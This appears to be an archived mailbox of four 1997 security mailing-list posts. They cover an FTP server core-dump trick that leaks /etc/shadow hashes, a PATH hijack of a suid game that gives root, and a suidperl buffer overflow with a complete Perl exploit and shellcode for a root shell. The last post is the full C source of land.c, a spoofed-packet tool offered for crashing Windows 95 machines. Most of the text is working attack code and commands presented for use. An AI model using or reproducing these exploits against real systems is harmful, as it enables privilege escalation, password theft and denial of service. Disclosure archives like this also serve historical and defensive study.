Bug In Security Dynamics' FTP server (Version 2.2)
Exploits Return-Path: <owner-bugtraq@NETSPACE.ORG>
Delivered-To: admin@skyway.ru
From: sp00n <sp00n@COUPLER.300BAUD.COM>
Subject: Bug In Security Dynamics' FTP server (Version 2.2)
To: BUGTRAQ@NETSPACE.ORG
Status:
X-PMFLAGS: 34078848 0
Hi,
This bug is similar to the solaris and other ftp core dump bugs, slightly
diffrent though. BTW the machine is a SPARC 20 running 2.5, You can link
files and clobber them with a core to annoy your local sys admin or, even
better get /etc/shadow, u get the point... anyways
220 cornholio Security Dynamics' FTP server (Version 2.2) ready.
Name (.:joeuser): joeuser
331 Password required for mpotter.
Password:
230 User joeuser logged in.
ftp> cd /tmp
250 CWD command successful.
ftp> user root DUMP_CORE_FTPD
331 Password required for root.
530 Login incorrect.
Login failed.
ftp> quote pasv
421 Service not available, remote server has closed connection
ftp> quit
$ ls -la core
-rw-r----- 1 root network 264656 Nov 12 11:14 core
At least it dosent dump 666 like solaris's in.ftpd :) But I cant read it
:(
Not too usefull You say? welp prior to dumping the core you should link it
to ps_data or something like that then you will get this
lrwxrwxrwx 1 joeuser network 7 Nov 12 11:07 core -> ps_data
-rw-rw-r-- 1 root sys 264656 Nov 12 11:07 ps_data
$file ps_data
ps_data: ELF 32-bit MSB core file SPARC Version 1, from '_sdi_ftpd'
$strings core | more
noaccess:*LK*:6445::::::
sp00n:o.IZGdC5eBTtKY:10175:7:28::::
root:aiqzotPNtTsI:9988::::::
user2:U6d5srjcJi/KU:9952::::::
joeuser:ktxVoVPQVIgc.:10175:7:28::::
root::0:root
other::1:
bin::2:root,daemon
sys::3:root,bin,adm
adm::4:root,daemon
uucp::5:root
�Return-Path: <owner-bugtraq@NETSPACE.ORG>
Delivered-To: admin@skyway.ru
Received: (qmail 22937 invoked from network); 13 Nov 1997 01:01:32 -0000
Received: from scylla.sovam.com (194.67.2.97)
by sky.tyumen.dial.sovam.com with SMTP; 13 Nov 1997 01:01:32 -0000
Received: by scylla.sovam.com id AA11143
(5.67b8s3p1/IDA-1.5 for admin@skyway.ru); Wed, 12 Nov 1997 21:41:13 +0300
Received: from conjurer.tyumen.ru by scylla.sovam.com with SMTP id AA10787
(5.67b8s3p1/IDA-1.5 for <admin@skyway.ru>); Wed, 12 Nov 1997 21:35:59 +0300
Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143])
by conjurer.tyumen.ru (8.8.5/8.8.5) with ESMTP id XAA24016
for <mc@CONJURER.TYUMEN.RU>; Wed, 12 Nov 1997 23:34:56 +0500 (ES)
Received: from unknown@netspace.org (port 58972 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <97840-12501>; Wed, 12 Nov 1997 11:38:11 -0500
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with
spool id 5583510 for BUGTRAQ@NETSPACE.ORG; Wed, 12 Nov 1997 11:37:06
-0500
Received: from brimstone.netspace.org (brimstone.netspace.org
[128.148.157.143]) by netspace.org (8.8.7/8.8.2) with ESMTP id
LAA05368 for <BUGTRAQ@NETSPACE.ORG>; Wed, 12 Nov 1997 11:26:35 -0500
Received: from unknown@netspace.org (port 58972 [128.148.157.6]) by
brimstone.netspace.org with ESMTP id <97567-12502>; Wed, 12 Nov 1997
11:26:29 -0500
Approved-By: aleph1@UNDERGROUND.ORG
Received: from bomber.stealth.com.au (stealth.com.au [203.7.132.161]) by
netspace.org (8.8.7/8.8.2) with ESMTP id AAA12340 for
<bugtraq@netspace.org>; Wed, 12 Nov 1997 00:29:43 -0500
Received: from localhost (suid@localhost) by bomber.stealth.com.au
(8.8.5/8.7.3) with SMTP id QAA31105 for <bugtraq@netspace.org>; Wed,
12 Nov 1997 16:30:05 +1100
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.LNX.3.95.971112162613.31054A-100000@bomber.stealth.com.au>
Date: Wed, 12 Nov 1997 16:30:03 +1100
Reply-To: SUID <suid@BOMBER.STEALTH.COM.AU>
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: SUID <suid@BOMBER.STEALTH.COM.AU>
Subject: Vunerability in Lizards game
To: BUGTRAQ@NETSPACE.ORG
Status:
X-PMFLAGS: 34078848 0
Greetings.
Recently looking through the source of the suid root game called Lizards I
noticed a vunerablity which is incredibly trivial to allow regular users
at the console gain unauthorized root access.
The exploitable code is found in the main portion of the code, on the
second last line in fact:
---
...
system("clear");
return EXIT_SUCCESS;
}
---
As this program does not seem anywhere through relinquish root
privilidges, it executes "clear" (supposed to be /usr/bin/clear) as root,
assuming everything is cool. Simple changing of the users PATH environment
variable to something like PATH=.:/usr/games/lizardlib, then creating a
symlink (or a sh script) called "clear" that executes a shell of your
liking, will cause that command to be executed as root when the program
exits. Voila, a root shell.
Of course this requires the game to run smoothly. This game comes with
Slackware 3.4 in the y package.
Lame fix: chmod -s /usr/games/lizardlib/lizardshi
Better fix: Change the source code, recompile lizards to reference "clear"
absoloutley.
Regards
suid@stealth.com.au
�Return-Path: <best-of-security-request@cyber.com.au>
Delivered-To: admin@skyway.ru
Received: (qmail 1133 invoked from network); 16 Nov 1997 12:31:37 -0000
Received: from scylla.sovam.com (194.67.2.97)
by sky.tyumen.dial.sovam.com with SMTP; 16 Nov 1997 12:31:37 -0000
Received: by scylla.sovam.com id AA06873
(5.67b8s3p1/IDA-1.5 for admin@skyway.ru); Sun, 16 Nov 1997 14:14:29 +0300
Received: from conjurer.tyumen.ru by scylla.sovam.com with SMTP id AA06687
(5.67b8s3p1/IDA-1.5 for <admin@skyway.ru>); Sun, 16 Nov 1997 14:12:22 +0300
Received: from plum.cyber.com.au (plum.cyber.com.au [203.7.155.24])
by conjurer.tyumen.ru (8.8.5/8.8.5) with ESMTP id QAA13490
for <mc@conjurer.tyumen.ru>; Sun, 16 Nov 1997 16:11:58 +0500 (ES)
Received: (from slist@localhost)
by plum.cyber.com.au (8.8.6/8.8.6) id VAA01852;
Sun, 16 Nov 1997 21:50:51 +1100 (EST)
Resent-Date: Sun, 16 Nov 1997 21:50:51 +1100 (EST)
Delivered-To: mc@conjurer.tyumen.ru
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.LNX.3.95.971113162510.3729B-100000@kerberos.troja.mff.cuni.cz>
Date: Thu, 13 Nov 1997 18:14:28 +0100
Reply-To: peak@kerberos.troja.mff.cuni.cz
Sender: avalon@cyber.com.au
From: Pavel Kankovsky <peak@kerberos.troja.mff.cuni.cz>
Old-X-Originally-To: To: BUGTRAQ@NETSPACE.ORG
Old-X-Originated-From: From: Pavel Kankovsky <peak@kerberos.troja.mff.cuni.cz>
Resent-Message-Id: <"xpmNeB.A.KYF.r0ob0"@plum>
X-Loop: best-of-security@cyber.com.au
Errors-To: best-of-security-request@cyber.com.au
Precedence: list
Resent-Sender: best-of-security-request@cyber.com.au
To: best-of-security@cyber.com.au
Resent-From: best-of-security@cyber.com.au
X-Mailing-List: <best-of-security@cyber.com.au> ftp://ftp.cyber.com.au/pub/archive/b-o-s/
X-Subscription: To unsubscribe from this fine mailing list mail best-of-security-request@cyber.com.au with Subject: unsubscribe
Subject: BoS: another buffer overrun in sperl5.003
Status:
X-PMFLAGS: 34078848 0
Summary:
Any user can gain root privileges on a Intel Linux system with suidperl
5.003 (having the suid bit, of course) even if "SUIDBUF" and "two suidperl
security patches" have been applied. Non-Intel / non-Linux platforms may
be affected as well.
Quick fix:
chmod u-s /usr/bin/sperl5.003 (what else?)
Details:
There is a nasty bug in mess() (util.c): it is possible to overflow
its buffer (via sprintf()); mess() tries to detect this situation but
fails to handle the problem properly:
[excerpt from util.c]
if (s - s_start >= sizeof(buf)) { /* Ooops! */
if (usermess)
fputs(SvPVX(tmpstr), stderr);
else
fputs(buf, stderr);
fputs("panic: message overflow - memory corrupted!\n",stderr);
my_exit(1);
}
It does not abort immediately. It prints out an error message and calls
my_exit(1), and this is very bad.
$ perl -v
This is perl, version 5.003 with EMBED
Locally applied patches:
SUIDBUF - Buffer overflow fixes for suidperl security
built under linux at Apr 22 1997 10:04:46
+ two suidperl security patches
$ perl `perl -e "print 'A' x 3000"`
Can't open perl script "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
...AAAAAAAAAAAAAAAAA": File name too long
panic: message overflow - memory corrupted!
$ Can't open perl script "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
...AAAAAAAAAAAAAAAAA": File name too long
panic: message overflow - memory corrupted!
Segmentation fault (core dumped)
$ gdb /usr/bin/perl core
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.16 (i586-unknown-linux), Copyright 1996 Free Software Foundation,
Inc...
(no debugging symbols found)...
Core was generated by `perl AAAAA...'.
Program terminated with signal 11, Segmentation fault.
Reading symbols ...
...
#0 0x41414141 in ?? ()
(gdb)
Voila! 0x41414141 == "AAAA"
The variable called top_env has been overwritten. In fact, it is jmp_buf
and Perl calls longjmp() with it somewhere in my_exit().
Run this and wait for a root prompt:
[exploit code]
#!/usr/bin/perl
# yes, this suidperl exploit is in perl, isn't it wonderful? :)
$| = 1;
$shellcode =
"\x90" x 512 . # nops
"\xbc\xf0\xff\xff\xbf" . # movl $0xbffffff0,%esp
# "standard shellcode" by Aleph One
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" .
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" .
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
# start and end of .data
# adjust this using /proc/*/maps
$databot = 0x080a2000;
$datatop = 0x080ab000;
# trial and error loop
$address = $databot + 4;
while ($address < $datatop) {
$smash_me =
$shellcode . ('A' x (2052 - length($shellcode))) .
(pack("l", $address) x 1000) . ('B' x 1000);
$pid = fork();
if (!$pid) {
exec('/usr/bin/sperl5.003', $smash_me);
}
else {
wait;
if ($? == 0) {
printf("THE MAGIC ADDRESS WAS %08x\n", $address);
exit;
}
}
$address += 128;
}
[end of exploit code]
I have tested this on two Red Hat 4.2 systems running on Intel (with
perl-5.003-8 and -9). I am pretty sure any Intel-like Linux having
sperl5.003 is affected.
Other platforms may be affected too.
Perl 5.004 is NOT VULNERABLE.
--Pavel Kankovsky aka Peak (troja.mff.cuni.cz network administration)
�Return-Path: <owner-bugtraq@NETSPACE.ORG>
Delivered-To: admin@skyway.ru
Received: (qmail 13176 invoked from network); 22 Nov 1997 01:01:32 -0000
Received: from scylla.sovam.com (194.67.2.97)
by sky.tyumen.dial.sovam.com with SMTP; 22 Nov 1997 01:01:32 -0000
Received: by scylla.sovam.com id AA08397
(5.67b8s3p1/IDA-1.5 for admin@skyway.ru); Sat, 22 Nov 1997 03:10:31 +0300
Received: from conjurer.tyumen.ru by scylla.sovam.com with SMTP id AA08351
(5.67b8s3p1/IDA-1.5 for <admin@skyway.ru>); Sat, 22 Nov 1997 03:08:02 +0300
Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143])
by conjurer.tyumen.ru (8.8.5/8.8.5) with ESMTP id FAA07206
for <mc@CONJURER.TYUMEN.RU>; Sat, 22 Nov 1997 05:05:16 +0500 (ES)
Received: from unknown@netspace.org (port 4105 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <97381-10583>; Fri, 21 Nov 1997 14:34:29 -0500
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with
spool id 5788612 for BUGTRAQ@NETSPACE.ORG; Fri, 21 Nov 1997 14:33:13
-0500
Received: from brimstone.netspace.org (brimstone.netspace.org
[128.148.157.143]) by netspace.org (8.8.7/8.8.2) with ESMTP id
OAA24961 for <BUGTRAQ@NETSPACE.ORG>; Fri, 21 Nov 1997 14:22:56 -0500
Received: from unknown@netspace.org (port 4105 [128.148.157.6]) by
brimstone.netspace.org with ESMTP id <96581-10585>; Fri, 21 Nov 1997
14:22:53 -0500
Approved-By: aleph1@UNDERGROUND.ORG
Received: from carmen.broder.com (carmen.broder.com [207.77.64.2]) by
netspace.org (8.8.7/8.8.2) with ESMTP id NAA18871 for
<BUGTRAQ@NETSPACE.ORG>; Fri, 21 Nov 1997 13:58:59 -0500
Received: (from uucp@localhost) by carmen.broder.com (8.8.5/8.7.3) id KAA07964
for <BUGTRAQ@NETSPACE.ORG>; Fri, 21 Nov 1997 10:58:52 -0800 (PST)
Received: from pillbox.broder.com(10.10.13.58) by carmen.broder.com via smap
(V1.3) id sma007960; Fri Nov 21 10:58:40 1997
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.BSI.3.96.971121105621.1489C-100000@pillbox.broder.com>
Date: Fri, 21 Nov 1997 10:58:39 -0800
Reply-To: blast <blast@broder.com>
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: blast <blast@broder.com>
Subject: 44BSD port of land.c
To: BUGTRAQ@NETSPACE.ORG
Status:
X-PMFLAGS: 34078848 0
For those of you who don't have all the "fancy" LINUX
networking includes, here is a port to 44BSD flavors.
Should compile fine on FreeBSD, NetBSD, OpenBSD, BSDi, etc.
Enjoy.
-blast
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
\ Tim Keanini | "The limits of my language, /
/ | are the limits of my world." \
\ blast@broder.com | --Ludwig Wittgenstein /
\ +================================================/
|Key fingerprint = 7B 68 88 41 A8 74 AB EC F0 37 98 4C 37 F7 40 D6 |
/ PUB KEY: http://www-swiss.ai.mit.edu/~bal/pks-commands.html \
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
/* land.c by m3lt, FLC
crashes a win95 box
Ported by blast and jerm to 44BSD*/
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/ip_icmp.h>
#include <ctype.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
/* #include <netinet/ip_tcp.h> */
/* #include <netinet/protocols.h> */
struct pseudohdr
{
struct in_addr saddr;
struct in_addr daddr;
u_char zero;
u_char protocol;
u_short length;
struct tcphdr tcpheader;
};
u_short checksum(u_short * data,u_short length)
{
register long value;
u_short i;
for(i=0;i<(length>>1);i++)
value+=data[i];
if((length&1)==1)
value+=(data[i]<<8);
value=(value&65535)+(value>>16);
return(~value);
}
int main(int argc,char * * argv)
{
struct sockaddr_in sin;
struct hostent * hoste;
int sock,foo;
char buffer[40];
struct ip * ipheader=(struct ip *) buffer;
struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct ip));
struct pseudohdr pseudoheader;
fprintf(stderr,"land.c by m3lt mod by blast, FLC\n");
if(argc<3)
{
fprintf(stderr,"usage: %s IP port\n",argv[0]);
return(-1);
}
bzero(&sin,sizeof(struct sockaddr_in));
sin.sin_family=AF_INET;
if((hoste=gethostbyname(argv[1]))!=NULL)
bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length);
else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
{
fprintf(stderr,"unknown host %s\n",argv[1]);
return(-1);
}
if((sin.sin_port=htons(atoi(argv[2])))==0)
{
fprintf(stderr,"unknown port %s\n",argv[2]);
return(-1);
}
if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
{
fprintf(stderr,"couldn't allocate raw socket\n");
return(-1);
}
foo=1;
if(setsockopt(sock,0,IP_HDRINCL,&foo,sizeof(int))==-1)
{
fprintf(stderr,"couldn't set raw header on socket\n");
return(-1);
}
bzero(&buffer,sizeof(struct ip)+sizeof(struct tcphdr));
ipheader->ip_v=4;
ipheader->ip_hl=sizeof(struct ip)/4;
ipheader->ip_len=sizeof(struct ip)+sizeof(struct tcphdr);
ipheader->ip_id=htons(0xF1C);
ipheader->ip_ttl=255;
ipheader->ip_p=IPPROTO_TCP;
ipheader->ip_src=sin.sin_addr;
ipheader->ip_dst=sin.sin_addr;
tcpheader->th_sport=sin.sin_port;
tcpheader->th_dport=sin.sin_port;
tcpheader->th_seq=htonl(0xF1C);
tcpheader->th_flags=TH_SYN;
tcpheader->th_off=sizeof(struct tcphdr)/4;
tcpheader->th_win=htons(2048);
bzero(&pseudoheader,12+sizeof(struct tcphdr));
pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.protocol=6;
pseudoheader.length=htons(sizeof(struct tcphdr));
bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));
if(sendto(sock,buffer,sizeof(struct ip)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)
{
fprintf(stderr,"couldn't send packet,%d\n",errno);
return(-1);
}
fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]);
close(sock);
return(0);
}
�
